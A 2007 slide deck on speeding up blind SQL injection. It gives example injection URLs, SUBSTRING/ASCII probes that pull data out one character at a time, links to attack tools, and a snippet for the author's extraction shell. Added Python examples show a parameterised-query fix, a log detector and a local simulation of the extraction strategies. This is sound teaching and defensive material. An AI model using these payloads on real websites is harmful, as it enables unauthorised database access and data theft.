Blind SQL injection: Optimization techniques
Rodrigo Marcos, December 2007

Agenda
- What is (blind) SQL injection
- Available open source tools
- Blind SQL injection optimizations
- Demo
- Conclusions
- Questions

What is SQL injection?
- A well known and widely exploited technique
- Mainly exploited in web environments
- It abuses improper validation of user input
- It allows an attacker to reach the database
SQL injection example
- Normal request: http://victim/listproducts.asp?cat=books
  SELECT * from PRODUCTS WHERE category='books'
- Injected request: http://victim/listproducts.asp?cat=books' or '1'='1
  SELECT * from PRODUCTS WHERE category='books' or '1'='1'
Basically, with SQL injection the attacker gets query results back.
What is blind SQL injection?
- The same vulnerability as SQL injection
- A *very* common vulnerability
- Sometimes (wrongly) ignored during tests as unexploitable, or not detected at all
- The attacker cannot retrieve query results
- The attacker can only retrieve a True/False condition
Blind SQL injection example
- http://victim/showproduct.asp?id=238
  SELECT * from PRODUCTS WHERE id=238
- Sometimes, due to the code surrounding the SQL query (grouped or sorted results), the attacker can't UNION and no 'good' way of exploitation is found
- http://victim/showproduct.asp?id=238 and 1=1
  SELECT * from PRODUCTS WHERE id=238 and 1=1
- http://victim/showproduct.asp?id=238 and 1=2
  SELECT * from PRODUCTS WHERE id=238 and 1=2
- Blind SQL injection is present if the two requests above return different results
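Slides 4 and 6 show a string parameter and a numeric parameter being pasted into SQL text. The following Python example, added here and not part of the presentation, rebuilds both injection points against an in-memory SQLite table of constructed sample rows and places the parameterised versions beside them, so the difference in returned rows (and the True/False behaviour of the numeric case) can be checked directly. The function names, the sample rows and the use of SQLite are assumptions of this example.

```python
import sqlite3

# Added example (not from the presentation): the string and numeric injection
# points of slides 4 and 6 rebuilt against an in-memory SQLite table, beside
# the parameterised versions. Table rows are constructed sample data.


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE PRODUCTS (id INTEGER PRIMARY KEY, name TEXT, category TEXT)")
    con.executemany("INSERT INTO PRODUCTS (id, name, category) VALUES (?, ?, ?)",
                    [(238, "SQL Antipatterns", "books"),
                     (239, "The Art of SQL", "books"),
                     (301, "USB key", "storage")])
    return con


# --- vulnerable: the parameter becomes part of the SQL text (slides 4 and 6) ---
def list_products_unsafe(con, cat):
    sql = "SELECT name FROM PRODUCTS WHERE category='" + cat + "' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def show_product_unsafe(con, id_param):
    sql = "SELECT name FROM PRODUCTS WHERE id=" + id_param
    row = con.execute(sql).fetchone()
    return row[0] if row else None


# --- hardened: the value travels as a bound parameter, never as SQL text ---
def list_products_safe(con, cat):
    rows = con.execute("SELECT name FROM PRODUCTS WHERE category=? ORDER BY id", (cat,))
    return [row[0] for row in rows]


def show_product_safe(con, id_param):
    product_id = int(id_param)   # "238 and 1=1" is rejected with ValueError
    row = con.execute("SELECT name FROM PRODUCTS WHERE id=?", (product_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(list_products_unsafe(db, "books' or '1'='1"))   # every row, slide 4
    print(list_products_safe(db, "books' or '1'='1"))     # no such category: []
    print(show_product_unsafe(db, "238 and 1=1"))          # the product
    print(show_product_unsafe(db, "238 and 1=2"))          # None: the True/False oracle
    try:
        show_product_safe(db, "238 and 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

Binding the value is what closes the hole: with `?` placeholders the quote in `books' or '1'='1` is just data, and the numeric endpoint rejects anything that is not an integer before the database ever sees it. The `int()` cast on its own would not help the string parameter, which is why parameterisation is the fix and input validation only a second layer.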
Exploiting True/False conditions
- SELECT user returns 'dbo'
- SUBSTRING('Select user', 1, 1) = 'd'
- SUBSTRING('Select user', 2, 1) = 'b'
- SUBSTRING('Select user', 3, 1) = 'o'
- http://victim/showproduct.asp?id=238 and SUBSTRING('Select user', 1, 1) = 'd' -> TRUE
- http://victim/showproduct.asp?id=238 and SUBSTRING('Select user', 1, 1) = 'X' -> FALSE
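Slides 6 and 7 describe exactly the request pattern a defender can look for: a 1=1 / 1=2 pair against the same URL, followed by a stream of SUBSTRING/ASCII probes, with the two boolean probes producing different responses. The following Python example, added here and not part of the presentation, runs that detection over a few constructed access log lines (Apache combined-style prefix, RFC 5737 test addresses) and reports per client and path how many probes were seen and whether the 1=1 / 1=2 pair returned different response sizes. The log format, regular expressions, threshold and function names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Added example (not from the presentation): flags the request patterns that
# slides 6 and 7 describe, over web server access log lines, and confirms a
# working boolean oracle when the 1=1 / 1=2 pair got different response sizes.

# Constructed sample log (Apache combined-style prefix, RFC 5737 test addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Dec/2007:10:00:01 +0000] "GET /showproduct.asp?id=238 HTTP/1.1" 200 5123
198.51.100.7 - - [10/Dec/2007:10:00:02 +0000] "GET /showproduct.asp?id=238%20and%201%3D1 HTTP/1.1" 200 5123
198.51.100.7 - - [10/Dec/2007:10:00:03 +0000] "GET /showproduct.asp?id=238%20and%201%3D2 HTTP/1.1" 200 412
198.51.100.7 - - [10/Dec/2007:10:00:04 +0000] "GET /showproduct.asp?id=238%20and%20ASCII(SUBSTRING((select%20user),1,1))%3E%3D110 HTTP/1.1" 200 412
203.0.113.5 - - [10/Dec/2007:10:00:05 +0000] "GET /listproducts.asp?cat=books HTTP/1.1" 200 8810
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
                    r' (?P<status>\d{3}) (?P<bytes>\d+|-)')
# 'and 1=1' (both sides identical: tautology) vs. 'and 1=2' (contradiction).
BOOL_RE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)\b", re.I)
# Functions used for character-at-a-time extraction (slide 7 and slides 10-12).
CHAR_PROBE_RE = re.compile(r"\b(?:substring|ascii|upper|lower|cast|len)\s*\(", re.I)


def classify(query):
    """Return the set of probe tags found in a (still URL-encoded) query string."""
    q = unquote_plus(query)
    tags = set()
    for m in BOOL_RE.finditer(q):
        tags.add("tautology" if m.group(1) == m.group(2) else "contradiction")
    if CHAR_PROBE_RE.search(q):
        tags.add("char-probe")
    return tags


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {"ip": m["ip"], "path": url.path, "query": url.query,
            "bytes": 0 if m["bytes"] == "-" else int(m["bytes"])}


def analyse(lines, probe_threshold=3):
    """Group probes per (client, path). A finding is raised when the probe count
    reaches the threshold, or when a tautology/contradiction pair returned
    different response sizes, i.e. the page behaves as a True/False oracle."""
    per_key = defaultdict(lambda: {"tags": defaultdict(int), "sizes": {}})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        entry = per_key[(rec["ip"], rec["path"])]
        for t in tags:
            entry["tags"][t] += 1
        if "tautology" in tags:
            entry["sizes"]["true"] = rec["bytes"]
        if "contradiction" in tags:
            entry["sizes"]["false"] = rec["bytes"]
    findings = []
    for (ip, path), entry in per_key.items():
        sizes = entry["sizes"]
        total = sum(entry["tags"].values())
        oracle = "true" in sizes and "false" in sizes and sizes["true"] != sizes["false"]
        if total >= probe_threshold or oracle:
            findings.append({"ip": ip, "path": path, "probes": total,
                             "tags": dict(entry["tags"]), "oracle_confirmed": oracle})
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(finding)
```

The response-size comparison is the part worth keeping: a single `and 1=1` in a search box is a plausible false positive, but a tautology and a contradiction against the same path that come back with different sizes is the same test the presenter uses on slide 6 to decide the page is exploitable. The per-path probe count then tracks the character-by-character extraction that follows, which is slow and therefore noisy.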
Available solutions
- Custom script: we can script it and discover each letter
  - Define the character space: [a-z] + [A-Z] + [0-9] + [symbols]
  - Loop over every character
- Absinthe: http://www.0x90.org/releases/absinthe/
- BSQLBF: http://www.unsec.net/download/bsqlbf.pl (demo video: http://www.unsec.net/download/bsqlbf.avi)
- SQLMap, SQLBrute.py

Available solutions (continued)
- Custom scripts: not reusable. I got sick of writing dirty BSQL injection scripts...
- Available open source tools:
  - Some of them are too dumb while trying to be smart (and don't work in special situations)
  - Most are not interactive
  - None are optimized for speed
Blind SQL injection optimizations
Narrow down the charset:
- ASCII(UPPER(SUBSTRING((SQL Query), Position, 1))) = ASCII(SUBSTRING((SQL Query), Position, 1))
- ASCII(LOWER(SUBSTRING((SQL Query), Position, 1))) = ASCII(SUBSTRING((SQL Query), Position, 1))
- If only the first one is true, the character is uppercase
- If only the second one is true, the character is lowercase
- If both are true, it is a number or symbol
Blind SQL injection optimizations
Searching the character space: [a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z]
- Sequential search: not optimal
- Divide and conquer! Compare against the middle character 'm':
  if character >= 'm', search [m,n,o,p,q,r,s,t,u,v,w,x,y,z]; else search [a,b,c,d,e,f,g,h,i,j,k,l]
Blind SQL injection optimizations
Big numbers for table enumeration
- Typical MSSQL table id: 2089058478
- Absinthe: increase exponentially from 0 by a factor of two, then narrow down once the upper limit is discovered
- Optimization: CAST(Number as varchar) and treat it as a string of digits
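Slides 10 to 12 claim that case narrowing, divide and conquer over the character space, and casting big numbers to strings all reduce the number of True/False questions needed. The following Python example, added here and not part of the presentation or of bsqlishell.py, makes that claim measurable: a constructed in-process stand-in answers only yes/no questions about a secret and counts them, and each strategy from the slides is run against it. One question corresponds to one HTTP request in a real blind attack, so the counts are both the cost the slides optimise and, for a defender, the request volume a rate-based detection rule can expect. The oracle class, the symbol set `_$@#`, the sample secrets and the function names are assumptions of this example.

```python
import string

# Added example (not from the presentation): simulates the search strategies of
# slides 10-12 against a local stand-in oracle and counts the yes/no questions
# each one needs. Secrets, symbol set and helper names are constructed.

LOWER, UPPER = string.ascii_lowercase, string.ascii_uppercase
OTHER = string.digits + "_$@#"            # constructed "number or symbol" set
CHARSET = LOWER + UPPER + OTHER           # order used by the sequential search


class BlindOracle:
    """Constructed stand-in for a blind injection point: holds a secret and
    answers only True/False questions about it, counting every question."""

    def __init__(self, secret):
        self._secret = str(secret)
        self.questions = 0

    def ask(self, kind, pos=None, value=None):
        self.questions += 1
        s = self._secret
        if kind == "len_ge":      # LEN(secret) >= value
            return len(s) >= value
        if kind == "num_ge":      # secret, read as a number, >= value
            return int(s) >= value
        ch = s[pos - 1]           # SUBSTRING is 1-based, as in SQL
        if kind == "eq":          # SUBSTRING(secret, pos, 1) = value
            return ch == value
        if kind == "ge":          # ASCII(SUBSTRING(secret, pos, 1)) >= value
            return ord(ch) >= value
        if kind == "upper_eq":    # ASCII(UPPER(c)) = ASCII(c)
            return ch.upper() == ch
        if kind == "lower_eq":    # ASCII(LOWER(c)) = ASCII(c)
            return ch.lower() == ch
        raise ValueError(kind)


def find_length(oracle, max_len=64):
    """Binary search for LEN(secret) in [0, max_len] using 'LEN >= n' questions."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle.ask("len_ge", value=mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def extract_sequential(oracle, charset=CHARSET):
    """Slide 8 approach: try every character of the charset in order."""
    out = []
    for pos in range(1, find_length(oracle) + 1):
        for ch in charset:
            if oracle.ask("eq", pos, ch):
                out.append(ch)
                break
        else:
            raise ValueError("character at position %d not in charset" % pos)
    return "".join(out)


def narrow_charset(oracle, pos):
    """Slide 10: two case questions decide which sub-charset the character is in."""
    upper_same = oracle.ask("upper_eq", pos)
    lower_same = oracle.ask("lower_eq", pos)
    if upper_same and lower_same:     # unchanged by both: number or symbol
        return OTHER
    return UPPER if upper_same else LOWER


def bisect_char(oracle, pos, candidates):
    """Slide 11: divide and conquer over an ASCII-sorted candidate list."""
    cands = sorted(candidates)
    while len(cands) > 1:
        mid = len(cands) // 2
        if oracle.ask("ge", pos, ord(cands[mid])):
            cands = cands[mid:]
        else:
            cands = cands[:mid]
    return cands[0]


def extract_binary(oracle):
    """Case narrowing followed by binary search, one character at a time."""
    return "".join(bisect_char(oracle, pos, narrow_charset(oracle, pos))
                   for pos in range(1, find_length(oracle) + 1))


def number_by_doubling(oracle):
    """Absinthe-style (slide 12): double an upper bound, then bisect."""
    hi = 1
    while oracle.ask("num_ge", value=hi):
        hi *= 2
    lo = hi // 2                       # from here on: lo <= n < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle.ask("num_ge", value=mid):
            lo = mid
        else:
            hi = mid
    return lo


def number_as_string(oracle):
    """Slide 12 optimisation: CAST(n AS varchar), then extract digits as a string."""
    digits = [bisect_char(oracle, pos, string.digits)
              for pos in range(1, find_length(oracle, max_len=20) + 1)]
    return int("".join(digits))


def compare(secret="WebApp_DB7", number=2089058478):
    """Run every strategy on a fresh oracle and return the question counts."""
    results = {}
    for name, fn, value in (("sequential", extract_sequential, secret),
                            ("narrow+bisect", extract_binary, secret),
                            ("doubling", number_by_doubling, number),
                            ("cast-to-string", number_as_string, number)):
        oracle = BlindOracle(value)
        assert fn(oracle) == value, name
        results[name] = oracle.questions
    return results


if __name__ == "__main__":
    for name, count in compare().items():
        print("%-15s %4d questions" % (name, count))
```

Two things the counts make visible: the slide's big number costs about 62 questions by doubling and bisecting (32 to pass the upper bound, 30 to bisect between 2^30 and 2^31) but under 45 when its ten digits are pulled out one by one, and the case test only pays off once the symbol set is large, since two extra questions per character buy back about one bisection step over the 26 letters. Every strategy still needs several questions per character, which is why even an optimised extraction leaves a long run of near-identical requests in the logs.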
bsqlishell.py
- I wanted to code something generic, to forget about custom scripts
- I wanted to implement optimal techniques, as BSQL injection is *REALLY* slow
- Interactive shell + scriptable (Scapy-like)
- bsqlishell.py is fast(er)!!
- Portable (Python rocks!)

Demo

...and more: interaction sucks! I want something scriptable!
  from bsishell import *
  pre = "http://www.vulnerable.com?id=1' and "
  post = " or '1'='2"
  user()
  table_enumeration()
Conclusions
- Blind SQL injection can be exploited, and it really makes a difference
- The attack can be optimized to need fewer requests to the database
- bsqlishell.py is quite cool (shameless propaganda)

Thanks. Questions?
